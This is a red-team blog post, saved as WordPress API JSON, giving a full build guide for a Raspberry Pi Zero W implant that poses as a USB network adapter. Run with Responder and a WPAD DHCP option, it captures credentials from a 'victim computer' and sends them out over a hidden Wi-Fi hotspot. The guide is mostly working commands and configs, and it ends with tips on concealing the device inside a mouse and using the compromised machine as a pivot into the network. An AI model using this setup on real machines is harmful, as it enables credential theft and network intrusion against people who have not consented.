{"id":1353,"date":"2017-03-08T23:07:11","date_gmt":"2017-03-08T23:07:11","guid":{"rendered":"https:\/\/www.phillips321.co.uk\/?p=1353"},"modified":"2017-03-09T01:14:34","modified_gmt":"2017-03-09T01:14:34","slug":"wipiresponder-pi-zero-w-responder","status":"publish","type":"post","link":"https:\/\/www.phillips321.co.uk\/2017\/03\/08\/wipiresponder-pi-zero-w-responder\/","title":{"rendered":"WiPiResponder = Pi Zero W + Responder"},"content":{"rendered":"<p><a href=\"https:\/\/www.phillips321.co.uk\/wp-content\/uploads\/2017\/03\/IMG_1334.jpg\"><img loading=\"lazy\" src=\"https:\/\/www.phillips321.co.uk\/wp-content\/uploads\/2017\/03\/IMG_1334-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" class=\"aligncenter size-medium wp-image-1356\" srcset=\"https:\/\/www.phillips321.co.uk\/wp-content\/uploads\/2017\/03\/IMG_1334-300x225.jpg 300w, https:\/\/www.phillips321.co.uk\/wp-content\/uploads\/2017\/03\/IMG_1334-768x576.jpg 768w, https:\/\/www.phillips321.co.uk\/wp-content\/uploads\/2017\/03\/IMG_1334-1024x768.jpg 1024w, https:\/\/www.phillips321.co.uk\/wp-content\/uploads\/2017\/03\/IMG_1334.jpg 2016w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>So there is the <a href=\"https:\/\/www.hak5.org\" target=\"_blank\">Hak5<\/a> <a href=\"https:\/\/lanturtle.com\" target=\"_blank\">LanTutle<\/a> which is a great bit of kit. However I feel it is severely limited by the lack of onboard WiFi. The same for <a href=\"https:\/\/twitter.com\/mubix\" target=\"_blank\">Mubix<\/a>&#8216;s post &#8216;<a href=\"https:\/\/room362.com\/post\/2016\/snagging-creds-from-locked-machines\/\" target=\"_blank\">Snagging Creds from locked machines&#8230;<\/a>&#8216;<\/p>\n<p>First off, buy yourself an PiZeroW. You&#8217;ll also need a MicroSD card and something to read\/write it.<\/p>\n<p>Download <a href=\"https:\/\/www.raspberrypi.org\/downloads\/raspbian\/\" target=\"_blank\">latest image of raspbian lite<\/a> and copy it to the MicroSD<\/p>\n<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/><\/div><\/td><td><div class=\"bash codecolorer\"><span class=\"kw2\">sudo<\/span> <span class=\"kw2\">dd<\/span> <span class=\"re2\">bs<\/span>=1m <span class=\"re2\">if<\/span>=<span class=\"nu0\">2017<\/span>-03-02-raspbian-jessie-lite.img <span class=\"re2\">of<\/span>=<span class=\"sy0\">\/<\/span>dev<span class=\"sy0\">\/<\/span>rdisk2<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<h1>Allow communication over usb cable.<\/h1>\n<p>The Raspberry Pi Zero W can emulate a client USB device (in this instance we will set it up as a usb ethernet adapter). We&#8217;ll need to modify boot parameters add <em>dtoverlay=dwc2<\/em> to last line in config.txt and in cmdline.txt after rootwait (the last word on the first line) add a space and then <em>modules-load=dwc2,g_ether<\/em> (delete everything after this)<br \/>\nAdd a blank file under \/boot called SSH. <em>touch \/Volumes\/boot\/ssh<\/em>, this will allow us to SSH to the device as the latest version of raspbian disables this by default.<\/p>\n<p>Boot the device, SSH in, permit root login, change the password and then smash the pi user:<\/p>\n<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/>4<br \/>5<br \/>6<br \/>7<br \/>8<br \/>9<br \/>10<br \/><\/div><\/td><td><div class=\"bash codecolorer\"><span class=\"kw2\">ssh<\/span> pi<span class=\"sy0\">@<\/span>raspberrypi.local<br \/>\n<span class=\"kw2\">sudo<\/span> <span class=\"re5\">-s<\/span><br \/>\npassed<br \/>\nuserdel <span class=\"re5\">-r<\/span> pi<br \/>\n<span class=\"co0\">#modify \/etc\/ssh\/sshd_config PermitRootLogin to be &lt;em&gt;PermitRootLogin yes&lt;\/em&gt;<\/span><br \/>\n<span class=\"sy0\">\/<\/span>etc<span class=\"sy0\">\/<\/span>init.d<span class=\"sy0\">\/<\/span><span class=\"kw2\">ssh<\/span> restart<br \/>\n<span class=\"kw3\">exit<\/span><br \/>\n<span class=\"kw2\">ssh<\/span> root<span class=\"sy0\">@<\/span>raspberrypi.local<br \/>\nuserdel <span class=\"re5\">-r<\/span> pi<br \/>\n<span class=\"kw3\">echo<\/span> <span class=\"st0\">&quot;WiPiResponder&quot;<\/span> <span class=\"sy0\">&gt;<\/span> <span class=\"sy0\">\/<\/span>etc<span class=\"sy0\">\/<\/span><span class=\"kw2\">hostname<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p>Now we have a base build that will allow you to interact with it via USB ethernet and SSH it&#8217;s worth taking a back up so you can easily role back at any point.<\/p>\n<h1>Internet\/Packages&#8230;.<\/h1>\n<p>The next thing we need to do is get some packages on it, to do this we need to get the Pi Zero W on the internet. We&#8217;ll share our host devices internet to it, and as I&#8217;m on a MacBook this is pretty easy! Simply go to Sharing within System Preferences:<br \/>\n<a href=\"https:\/\/www.phillips321.co.uk\/wp-content\/uploads\/2017\/03\/Screen-Shot-2017-03-07-at-22.08.20.png\"><img loading=\"lazy\" src=\"https:\/\/www.phillips321.co.uk\/wp-content\/uploads\/2017\/03\/Screen-Shot-2017-03-07-at-22.08.20-300x146.png\" alt=\"\" width=\"300\" height=\"146\" class=\"aligncenter size-medium wp-image-1360\" srcset=\"https:\/\/www.phillips321.co.uk\/wp-content\/uploads\/2017\/03\/Screen-Shot-2017-03-07-at-22.08.20-300x146.png 300w, https:\/\/www.phillips321.co.uk\/wp-content\/uploads\/2017\/03\/Screen-Shot-2017-03-07-at-22.08.20-768x373.png 768w, https:\/\/www.phillips321.co.uk\/wp-content\/uploads\/2017\/03\/Screen-Shot-2017-03-07-at-22.08.20-1024x498.png 1024w, https:\/\/www.phillips321.co.uk\/wp-content\/uploads\/2017\/03\/Screen-Shot-2017-03-07-at-22.08.20.png 1292w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>In my case the pi got a DHCP IP address which also provided a default gateway, if your setup differs you might need to enable IP forwarding on your host as well as setting a default route.<\/p>\n<p>Once you connect back to your Pi it&#8217;s worth updating it, check it&#8217;s got an internet connection and then run apt-get:<\/p>\n<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/><\/div><\/td><td><div class=\"bash codecolorer\"><span class=\"kw2\">ping<\/span> <span class=\"re5\">-c1<\/span> 8.8.8.8<br \/>\n<span class=\"kw2\">apt-get update<\/span><br \/>\n<span class=\"kw2\">apt-get<\/span> <span class=\"re5\">-y<\/span> upgrade<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<h1>Install responder<\/h1>\n<p>In order to get responder going we need a few packages, as we have a working internet connection now well do it now.<\/p>\n<div class=\"codecolorer-container text vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/><\/div><\/td><td><div class=\"text codecolorer\">apt-get install -y python git python-pip python-dev screen sqlite3 inotify-tools<br \/>\npip install pycrypto<br \/>\ngit clone https:\/\/github.com\/spiderlabs\/responder<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p>We&#8217;ll finish off sorting out auto launching responder later.<\/p>\n<h1>Wireless HotSpot<\/h1>\n<p>So that you can remotely access the pi the next thing we need to do is configure the wireless card into AP mode using hostapd and dnsmasq.<\/p>\n<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/><\/div><\/td><td><div class=\"bash codecolorer\"><span class=\"kw2\">apt-get install<\/span> dnsmasq hostapd<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p>Now edit \/etc\/dhcpcd.conf and add the following line to the bottom of the file:<\/p>\n<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/><\/div><\/td><td><div class=\"bash codecolorer\">denyinterfaces wlan0<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p>Now we need to configure our static IP. To do this open up the interface configuration file <em>\/etc\/network\/interfaces<\/em> and edit the wlan0 section so that it looks like this:<\/p>\n<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/>4<br \/>5<br \/>6<br \/>7<br \/><\/div><\/td><td><div class=\"bash codecolorer\">allow-hotplug wlan0 &nbsp;<br \/>\niface wlan0 inet static &nbsp;<br \/>\n&nbsp; &nbsp; address 10.10.10.1<br \/>\n&nbsp; &nbsp; netmask 255.255.255.0<br \/>\n&nbsp; &nbsp; network 10.10.10.0<br \/>\n&nbsp; &nbsp; broadcast 10.10.10.255<br \/>\n<span class=\"co0\"># &nbsp; &nbsp;wpa-conf \/etc\/wpa_supplicant\/wpa_supplicant.conf<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p>And then restart dhcpcd service:<\/p>\n<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/><\/div><\/td><td><div class=\"bash codecolorer\">service dhcpcd restart<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p>Next we need to configure hostapd by creating a file at \/etc\/hostapd\/hostapd.conf with the following contents, feel free to change bits as you see fit:<\/p>\n<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/>4<br \/>5<br \/>6<br \/>7<br \/>8<br \/>9<br \/>10<br \/>11<br \/>12<br \/>13<br \/>14<br \/>15<br \/><\/div><\/td><td><div class=\"bash codecolorer\"><span class=\"re2\">interface<\/span>=wlan0<br \/>\n<span class=\"re2\">driver<\/span>=nl80211<br \/>\n<span class=\"re2\">ssid<\/span>=WiPiResponder<br \/>\n<span class=\"re2\">hw_mode<\/span>=g<br \/>\n<span class=\"re2\">channel<\/span>=<span class=\"nu0\">6<\/span><br \/>\n<span class=\"re2\">ieee80211n<\/span>=<span class=\"nu0\">1<\/span><br \/>\n<span class=\"re2\">wmm_enabled<\/span>=<span class=\"nu0\">1<\/span><br \/>\n<span class=\"re2\">ht_capab<\/span>=<span class=\"br0\">&#91;<\/span>HT40<span class=\"br0\">&#93;<\/span><span class=\"br0\">&#91;<\/span>SHORT-GI-<span class=\"nu0\">20<\/span><span class=\"br0\">&#93;<\/span><span class=\"br0\">&#91;<\/span>DSSS_CCK-<span class=\"nu0\">40<\/span><span class=\"br0\">&#93;<\/span><br \/>\n<span class=\"re2\">macaddr_acl<\/span>=<span class=\"nu0\">0<\/span><br \/>\n<span class=\"re2\">auth_algs<\/span>=<span class=\"nu0\">1<\/span><br \/>\n<span class=\"re2\">ignore_broadcast_ssid<\/span>=<span class=\"nu0\">0<\/span><br \/>\n<span class=\"re2\">wpa<\/span>=<span class=\"nu0\">2<\/span><br \/>\n<span class=\"re2\">wpa_key_mgmt<\/span>=WPA-PSK<br \/>\n<span class=\"re2\">wpa_passphrase<\/span>=WiPiResponder<br \/>\n<span class=\"re2\">rsn_pairwise<\/span>=CCMP<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p>We also need to tell hostapd where to look for the config file when it starts up on boot. Open up the default configuration file \/etc\/default\/hostapd and find the line #DAEMON_CONF=&#8221;&#8221; and replace it with DAEMON_CONF=&#8221;\/etc\/hostapd\/hostapd.conf&#8221;.<\/p>\n<p>Now we need to configure the DHCP service for the AP by editing the file \/etc\/dnsmasq.conf to contain the following:<\/p>\n<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/>4<br \/>5<br \/>6<br \/>7<br \/>8<br \/>9<br \/><\/div><\/td><td><div class=\"bash codecolorer\"><span class=\"re2\">interface<\/span>=wlan0 <br \/>\nlisten-address=10.10.10.1<br \/>\nbind-interfaces<br \/>\n<span class=\"re2\">server<\/span>=8.8.8.8 &nbsp;<br \/>\ndomain-needed<br \/>\ndhcp-range=interface:wlan0,10.10.10.100,10.10.10.200,12h<br \/>\ndhcp-option=wlan0,<span class=\"nu0\">3<\/span>,10.10.10.1<br \/>\nlog-queries<br \/>\nlog-dhcp<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p>And finally enabling IP forwarding before restarting the services:<\/p>\n<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/><\/div><\/td><td><div class=\"bash codecolorer\"><span class=\"kw3\">echo<\/span> <span class=\"nu0\">1<\/span> <span class=\"sy0\">&gt;<\/span> <span class=\"sy0\">\/<\/span>proc<span class=\"sy0\">\/<\/span>sys<span class=\"sy0\">\/<\/span>net<span class=\"sy0\">\/<\/span>ipv4<span class=\"sy0\">\/<\/span>ip_forward<br \/>\nservice hostapd restart<br \/>\nservice dnsmasq restart<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p>So now we have a working hotspot running on the pi, a quick <em>shutdown -r now<\/em> should reboot the device and allow you to connect.<\/p>\n<h1>Setting up DHCP on USB0<\/h1>\n<p>What we now need to do is configure the Pi to provide a DHCP service on usb0, we already have dnsmasq installed so we&#8217;ll simply use the same service and just configure it for usb0.<br \/>\nWe first of all need to update \/etc\/network\/interfaces to contain the following for usb0:<\/p>\n<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/>4<br \/>5<br \/>6<br \/><\/div><\/td><td><div class=\"bash codecolorer\">allow-hotplug usb0 &nbsp;<br \/>\niface usb0 inet static &nbsp;<br \/>\n&nbsp; &nbsp; address 10.10.20.1<br \/>\n&nbsp; &nbsp; netmask 255.255.255.0<br \/>\n&nbsp; &nbsp; network 10.10.20.0<br \/>\n&nbsp; &nbsp; broadcast 10.10.20.255<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p>Now you need to update \/etc\/dnsmasq config to include the following (see the additional lines containing usb0):<\/p>\n<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/>4<br \/>5<br \/>6<br \/>7<br \/>8<br \/>9<br \/>10<br \/>11<br \/>12<br \/>13<br \/>14<br \/>15<br \/>16<br \/><\/div><\/td><td><div class=\"bash codecolorer\"><span class=\"re2\">interface<\/span>=wlan0 <br \/>\n<span class=\"re2\">interface<\/span>=usb0<br \/>\nlisten-address=10.10.10.1<br \/>\nlisten-address=10.10.20.1<br \/>\nbind-interfaces<br \/>\n<span class=\"re2\">server<\/span>=8.8.8.8 &nbsp;<br \/>\ndomain-needed<br \/>\ndhcp-authoritative<br \/>\ndhcp-range=interface:wlan0,10.10.10.100,10.10.10.200,12h<br \/>\ndhcp-range=interface:usb0,10.10.20.100,10.10.20.200,12h<br \/>\ndhcp-option=wlan0,<span class=\"nu0\">3<\/span>,10.10.10.1<br \/>\ndhcp-option=usb0,<span class=\"nu0\">3<\/span>,10.10.20.1<br \/>\ndhcp-option=usb0,<span class=\"nu0\">252<\/span>,http:<span class=\"sy0\">\/\/<\/span>10.10.20.1<span class=\"sy0\">\/<\/span>wpad.dat<br \/>\nlog-queries<br \/>\nlog-dhcp<br \/>\n<span class=\"re2\">port<\/span>=<span class=\"nu0\">0<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p>Don&#8217;t forget to disable internet sharing on your MacBook so that it uses DHCP on the usb ethernet device.<\/p>\n<h1>Network Diagram<\/h1>\n<p>So we know how this all works it&#8217;s important to see how this is laid out. (God I love <a href=\"https:\/\/www.draw.io\" target=\"_blank\">draw.io<\/a>!)<br \/>\n<a href=\"https:\/\/www.phillips321.co.uk\/wp-content\/uploads\/2017\/03\/NetworkLayout.png\"><img loading=\"lazy\" src=\"https:\/\/www.phillips321.co.uk\/wp-content\/uploads\/2017\/03\/NetworkLayout-300x86.png\" alt=\"\" width=\"300\" height=\"86\" class=\"aligncenter size-medium wp-image-1365\" srcset=\"https:\/\/www.phillips321.co.uk\/wp-content\/uploads\/2017\/03\/NetworkLayout-300x86.png 300w, https:\/\/www.phillips321.co.uk\/wp-content\/uploads\/2017\/03\/NetworkLayout.png 575w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<h1>The home straight<\/h1>\n<p>So now we&#8217;ve got everything installed and set up the final thing to do is configure the attack vector. We need to create a service that starts on boot and runs responder. Add the following line to <em>\/etc\/rc.local<\/em> before the <em>exit 0<\/em> line:<\/p>\n<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/><\/div><\/td><td><div class=\"bash codecolorer\"><span class=\"sy0\">\/<\/span>usr<span class=\"sy0\">\/<\/span>bin<span class=\"sy0\">\/<\/span><span class=\"kw2\">screen<\/span> <span class=\"re5\">-dmS<\/span> responder <span class=\"kw2\">bash<\/span> <span class=\"re5\">-c<\/span> <span class=\"st_h\">'cd \/root\/responder\/; python Responder.py -I usb0 -f -w -r -d -F'<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p>Now responder will run in a screen session, to see how it&#8217;s going or interact with it type:<\/p>\n<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/><\/div><\/td><td><div class=\"bash codecolorer\"><span class=\"kw2\">screen<\/span> <span class=\"re5\">-r<\/span> responder<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p>To exit(detach) screen and leave responder running simply press &#8220;Ctrl-a then d&#8221;<\/p>\n<p>Now you&#8217;re good to go. Simply attach the Pi to the victim computer, walk away, connect back via wireless, SSH in and check the responder.db and log file for creds:<\/p>\n<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/><\/div><\/td><td><div class=\"bash codecolorer\">sqlite3 <span class=\"sy0\">\/<\/span>root<span class=\"sy0\">\/<\/span>responder<span class=\"sy0\">\/<\/span>Responder.db <span class=\"st_h\">'select * from responder'<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<h1>Closing thoughts<\/h1>\n<p>Should you wish to make this more of a Red Team attack vector there are a few things you could do to optimise the solution. The first thing would be to hide this inside a USB mouse along with a usb hub. This would then be almost indistinguishable other than the additional network card. It would also be worth disabling SSID broadcasting my adding the following line to \/etc\/hostapd\/hostapd.conf:<\/p>\n<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/><\/div><\/td><td><div class=\"bash codecolorer\"><span class=\"re2\">ignore_broadcast_ssid<\/span>=<span class=\"nu0\">1<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p>It&#8217;s also worth mentioning that you could now use the wifi hotspot and the compromised machine as a pivot point into the network from outside.<\/p>\n<p>Creds to other blog posts who helped me with this are <a href=\"https:\/\/learn.adafruit.com\/turning-your-raspberry-pi-zero-into-a-usb-gadget\/ethernet-gadget\" target=\"_blank\">AdaFruit<\/a>, <a href=\"https:\/\/frillip.com\/using-your-raspberry-pi-3-as-a-wifi-access-point-with-hostapd\/\" target=\"_blank\">Frillip<\/a> and <a href=\"https:\/\/th3s3cr3tag3nt.blogspot.co.uk\/2016\/10\/snagging-creds-from-locked-machines.html\" target=\"_blank\">Th3 S3cr3t Ag3nt<\/a>.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>So there is the Hak5 LanTutle which is a great bit of kit. However I feel it is severely limited by the lack of onboard WiFi. The same for Mubix&#8216;s post &#8216;Snagging Creds from locked machines&#8230;&#8216; First off, buy yourself an PiZeroW. You&#8217;ll also need a MicroSD card and something to read\/write it. Download latest [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":1356,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[468,469,463,97,464,465,350,351,466,409,25,467],"_links":{"self":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/1353"}],"collection":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/comments?post=1353"}],"version-history":[{"count":19,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/1353\/revisions"}],"predecessor-version":[{"id":1375,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/1353\/revisions\/1375"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/media\/1356"}],"wp:attachment":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/media?parent=1353"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/categories?post=1353"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/tags?post=1353"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}